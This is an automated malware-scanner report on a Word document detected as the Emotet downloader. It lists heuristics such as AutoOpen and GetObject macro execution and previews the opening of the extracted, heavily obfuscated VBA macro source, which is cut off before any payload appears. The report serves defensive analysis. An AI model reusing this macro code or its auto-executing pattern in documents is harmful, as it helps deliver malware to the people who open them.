MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains multiple high-severity heuristics indicating the presence of auto-executing VBA macros, specifically an AutoOpen macro that calls GetObject. ClamAV detection confirms this as Emotet, a known downloader family. The VBA macro code, though obfuscated, is characteristic of Emotet's behavior to download and execute further stages.
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-6863641-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6863641-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 73106 bytes |
SHA-256: b0c12544a74db81f0e15cb102781e92f754ec4314089984ea47a9d4e4ec1b37c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "H925_3"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "r_5_823"
Function G62318_()
H739_1 = 586228654 - 691008346
m97061_ = 5556033 + v_322309
Select Case l16_8_00
Case 305309342
z3433_2_ = Chr(108324084 * Tan(h835417_))
T___4937 = k4__0_
Case 965681069
c03__6_ = h9386_
X7_2_7_ = T94051
Case 577281855
O3_166__ = 851095863
H_3547 = U93748_4
End Select
t57__23 = 795929006 - 486297114
k_87_88 = 826922301 + i2_0_3_7
Select Case j571869_
Case 433321813
n35_534 = Chr(697433497 * Tan(T18530))
z450__ = Y_8__6_
Case 465598567
Z_8_0_9_ = w_5_70
F1785_05 = M_3174
Case 169324314
z892_73 = 596115131
o82_25_ = d_569585
End Select
f5685_ = 65687464 - 504488692
s1782352 = 550022110 + u044357_
Select Case s48_4_
Case 804615325
o591262_ = Chr(576469936 * Tan(R_96093))
X9_2_1 = n_786_87
Case 293284431
v28_0_ = f22988
J97229 = j9___2
Case 891925647
D5__0163 = 887162536
h5___95_ = B51832_
End Select
z65602 = 933219181 - 705418112
h2_332_ = 32656349 + E59974_1
Select Case H412771
Case 219298922
H__0_79 = Chr(430128947 * Tan(v64__0_))
V3___661 = m19_6956
Case 911594000
j7_78_14 = j65_44__
X_08559 = f5____
Case 724370197
Y05_8_ = 69384278
B26769 = p_43323
End Select
i88_292 = 423493778 - 232421187
A58351 = 612980487 + O_41871
Select Case B19590_
Case 775763640
z370___2 = Chr(421861865 * Tan(K_6_20))
X08__31 = n_791_34
Case 841671513
P05986 = N77_75
W397_4 = d393349
Case 281209163
I_5_766_ = 245585800
u_479_ = p617_1
End Select
s4794_ = 842366341 - 103087749
X_067_ = 305934119 + t3639_
Select Case j4_0282
Case 110219340
c0_4_9_2 = Chr(624506230 * Tan(r3480_))
C___63_ = T68462_
Case 837928534
W_37213 = Y36920
k_82_38_ = z7180659
Case 613817118
l_35__5 = 6898248
d551__8 = i__3362
End Select
R2__176 = 599453693 - 531820392
s_8_503 = 983399776 + G2_21_
Select Case A2__011
Case 500248428
P69_45 = Chr(613100183 * Tan(t185_9))
z__10_ = f9227__
Case 46938077
U04_07_9 = a__26_1
G9785007 = u474439
Case 966825132
Q41391 = 846220568
k9_34_ = E_3_181_
End Select
j76621_ = 156445723 - 647533155
b36__7__ = 887275053 + F2_9_0
Select Case M8483839
Case 408017018
v12__3 = Chr(997665208 * Tan(Q_672955))
N2__264 = K9_8__
Case 489653810
M_6_7976 = W83_____
z788_1 = O709862
Case 758178888
j350374 = 719511548
w91_6___ = C681303_
End Select
End Function
Function G0___9(A15706, H_55__55)
On Error Resume Next
r17_20__ = 451069782 - 959195055
l912_0_ = 779060155 + m5996240
Select Case p6022__6
Case 225361722
N7_86_36 = Chr(981665465 * Tan(Z242375_))
B__5____ = c6_7_01
Case 987656045
N_9__8 = k7266449
U_374_ = R_5875
Case 518299770
D3_6621 = 240098355
H_8438 = U__0_6_
End Select
i3433__ = 571309018 - 287955622
R___88 = 537878067 + V452_200
Select Case U8___8
Case 333981010
t2_74231 = Chr(864845650 * Tan(h_9_46))
N1335_ = c__340_
Case 979034486
n2__2_9 = h_1_703
k_086993 = p__91_0_
Case 205024266
R9154982 = 380215571
G14__4 = G__070
End Select
n87__5
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.